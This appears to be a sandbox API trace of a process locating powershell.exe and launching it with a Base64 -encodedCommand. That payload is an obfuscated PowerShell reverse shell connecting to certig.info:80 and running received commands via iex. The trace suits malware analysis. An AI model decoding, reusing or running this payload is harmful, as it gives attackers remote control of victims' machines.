	[0194.819] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.819] GetLastError () returned 0x2
	[0194.819] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.819] GetLastError () returned 0x2
	[0194.819] SetErrorMode (uMode=0x1) returned 0x1
	[0194.819] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.820] GetLastError () returned 0x2
	[0194.820] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.820] GetLastError () returned 0x2
	[0194.820] SetErrorMode (uMode=0x1) returned 0x1
	[0194.820] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.820] GetLastError () returned 0x2
	[0194.820] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.820] GetLastError () returned 0x2
	[0194.820] SetErrorMode (uMode=0x1) returned 0x1
	[0194.821] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JSE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.821] GetLastError () returned 0x2
	[0194.821] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.821] GetLastError () returned 0x2
	[0194.821] SetErrorMode (uMode=0x1) returned 0x1
	[0194.821] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSF", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.821] GetLastError () returned 0x2
	[0194.821] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.821] GetLastError () returned 0x2
	[0194.821] SetErrorMode (uMode=0x1) returned 0x1
	[0194.822] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSH", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.822] GetLastError () returned 0x2
	[0194.822] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.822] GetLastError () returned 0x2
	[0194.822] SetErrorMode (uMode=0x1) returned 0x1
	[0194.822] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.MSC", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.822] GetLastError () returned 0x2
	[0194.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.822] GetLastError () returned 0x2
	[0194.822] SetErrorMode (uMode=0x1) returned 0x1
	[0194.823] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.999] GetLastError () returned 0x2
	[0195.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.001] GetLastError () returned 0x2
	[0195.001] SetErrorMode (uMode=0x1) returned 0x1
	[0195.001] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.ps1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.001] GetLastError () returned 0x2
	[0195.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.002] GetLastError () returned 0x2
	[0195.002] SetErrorMode (uMode=0x1) returned 0x1
	[0195.002] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psm1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.002] GetLastError () returned 0x2
	[0195.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.002] GetLastError () returned 0x2
	[0195.002] SetErrorMode (uMode=0x1) returned 0x1
	[0195.002] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psd1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.003] GetLastError () returned 0x2
	[0195.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.003] GetLastError () returned 0x2
	[0195.003] SetErrorMode (uMode=0x1) returned 0x1
	[0195.003] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.COM", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.003] GetLastError () returned 0x2
	[0195.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.004] GetLastError () returned 0x2
	[0195.004] SetErrorMode (uMode=0x1) returned 0x1
	[0195.004] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.EXE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.004] GetLastError () returned 0x2
	[0195.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.004] GetLastError () returned 0x2
	[0195.004] SetErrorMode (uMode=0x1) returned 0x1
	[0195.004] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.BAT", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.005] GetLastError () returned 0x2
	[0195.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.005] GetLastError () returned 0x2
	[0195.005] SetErrorMode (uMode=0x1) returned 0x1
	[0195.005] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.CMD", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.005] GetLastError () returned 0x2
	[0195.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.005] GetLastError () returned 0x2
	[0195.005] SetErrorMode (uMode=0x1) returned 0x1
	[0195.006] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.006] GetLastError () returned 0x2
	[0195.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.006] GetLastError () returned 0x2
	[0195.006] SetErrorMode (uMode=0x1) returned 0x1
	[0195.006] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.006] GetLastError () returned 0x2
	[0195.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.006] GetLastError () returned 0x2
	[0195.007] SetErrorMode (uMode=0x1) returned 0x1
	[0195.007] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.007] GetLastError () returned 0x2
	[0195.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.007] GetLastError () returned 0x2
	[0195.007] SetErrorMode (uMode=0x1) returned 0x1
	[0195.007] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JSE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.008] GetLastError () returned 0x2
	[0195.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.008] GetLastError () returned 0x2
	[0195.008] SetErrorMode (uMode=0x1) returned 0x1
	[0195.008] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSF", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.008] GetLastError () returned 0x2
	[0195.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.008] GetLastError () returned 0x2
	[0195.008] SetErrorMode (uMode=0x1) returned 0x1
	[0195.008] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSH", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.009] GetLastError () returned 0x2
	[0195.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.009] GetLastError () returned 0x2
	[0195.009] SetErrorMode (uMode=0x1) returned 0x1
	[0195.009] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.MSC", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.009] GetLastError () returned 0x2
	[0195.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0195.010] GetLastError () returned 0x2
	[0195.010] SetErrorMode (uMode=0x1) returned 0x1
	[0195.010] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x53ff6a0
	[0195.010] GetLastError () returned 0x2
	[0195.011] FindNextFileW (in: hFindFile=0x53ff6a0, lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0195.011] GetLastError () returned 0x12
	[0195.011] FindClose (in: hFindFile=0x53ff6a0 | out: hFindFile=0x53ff6a0) returned 1
	[0195.011] SetErrorMode (uMode=0x1) returned 0x1
	[0195.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5f6e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0195.014] GetLastError () returned 0x12
	[0195.014] SetErrorMode (uMode=0x1) returned 0x1
	[0195.014] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x5f6ecfc | out: lpFileInformation=0x5f6ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3496a3ab, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3496a3ab, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6cea27f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6e800)) returned 1
	[0195.014] GetLastError () returned 0x12
	[0195.014] SetErrorMode (uMode=0x1) returned 0x1
	[0195.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.015] GetLastError () returned 0xcb
	[0195.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.016] GetLastError () returned 0xcb
	[0195.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.338] GetLastError () returned 0xcb
	[0195.580] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x628ea0, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x628ea0) returned 0x4550
	[0195.583] GetConsoleWindow () returned 0x50160
	[0195.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0195.593] GetLastError () returned 0xcb
	[0195.595] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0195.595] GetLastError () returned 0x0
	[0195.844] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0195.844] GetLastError () returned 0x0
	[0195.846] CommandLineToArgvW (in: lpCmdLine=" -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHAAQgBVAGMAUQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAG0AQwBBAGIAPQAoACQAcABCAFUAYwBRAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABVAFEAQwBWAEkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJAB2AHIASwBPAEcAPQAkAGQAbQBDAEEAYgAuAFIAZQBhAGQAKAAkAFUAUQBDAFYASQAsADAALAAkAFUAUQBDAFYASQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAHcARQBsAHYASwA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAVQBRAEMAVgBJACwAMAAsACQAdgByAEsATwBHACkAOwAkAFcASABzAEIAeAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAdwBFAGwAdgBLACAAMgA+ACYAMQApACkAOwAkAGQAbQBDAEEAYgAuAFcAcgBpAHQAZQAoACQAVwBIAHMAQgB4ACwAMAAsACQAVwBIAHMAQgB4AC4ATABlAG4AZwB0AGgAKQA7ACQAZABtAEMAQQBiAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABwAEIAVQBjAFEALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcABCAFUAYwBRAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", pNumArgs=0x5f6edec | out: pNumArgs=0x5f6edec) returned 0x53e0b10*=""
	[0195.846] GetLastError () returned 0x0
	[0195.846] lstrlenW (lpString="-encodedCommand") returned 15
	[0195.846] RtlMoveMemory (in: Destination=0x628ea0, Source=0x53e0b22, Length=0x20 | out: Destination=0x628ea0) 
